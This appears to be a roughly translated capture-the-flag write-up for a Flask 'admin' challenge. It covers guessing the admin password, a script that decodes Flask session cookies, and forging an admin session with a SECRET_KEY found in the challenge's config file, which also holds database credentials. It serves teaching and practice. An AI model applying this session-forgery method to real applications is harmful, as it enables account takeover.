The first step is to open the website, and there is a login and registration interface in the drop-down menu next to the welcome interface.
Check the source code.
There is a comment that prompts us to log in with the admin account.
Register an account casually and see if there are three interfaces after successful login
Just take a look and first go to the login registration page to try if there is any injection
I tried a restraint attack on the registration interface, and I just entered a 123 in the password — I didn't understand the seriousness of the matter at this time. I
reported an error, but it didn't seem to work. But this interface can still run python and
you can see some things. It feels like it can be used, but it should be too difficult for me. First look elsewhere.
Return to the login interface and try admin 123.
Fuck in? ? ?
At this moment, I am a little bit blinded, what's the matter, is the injection successful? Isn't it an error? Then I tried again, and the password was changed. Sure enough, it didn't work. It seems that the admin password is 123. /Vomit blood
I can give suggestions here. Since the knowledge points are not blasting, let's make the password more complicated. . .
Just go to watch the wp of the big guy
The boss said that there are three solutions, so I tried the first one
Flask session
fake unicode deception
conditional competition
It turns out that you can see the URL of the source code when you change the password
Solution 1: Forge flask session
For Flask's session mechanism, you can refer to this article: Flask source code analysis: session
For client session issues, you can refer to this article: Security issues caused by client session
Decrypted code
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))
indexheml
{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {
{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>
{% include('footer.html') %}
You can see that the flag can be displayed when the session name is admin
We also need SECRET_KEY if we want to forge session, the key can be found in config.py
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
SQLALCHEMY_TRACK_MODIFICATIONS = True
Flask session encrypted script
https://github.com/noraj/flask-session-cookie-manager
Encrypt the session with SECRET_KEY
and modify the request to send the request to get the flag
Only test to understand the first method, and did not try the second solution. The third solution is said to be just a theory
However, when I checked the information, I found that this framework still has the problem of leaking verification codes.
Get the session
decryption in the registration interface,
you can see that the verification code is in the session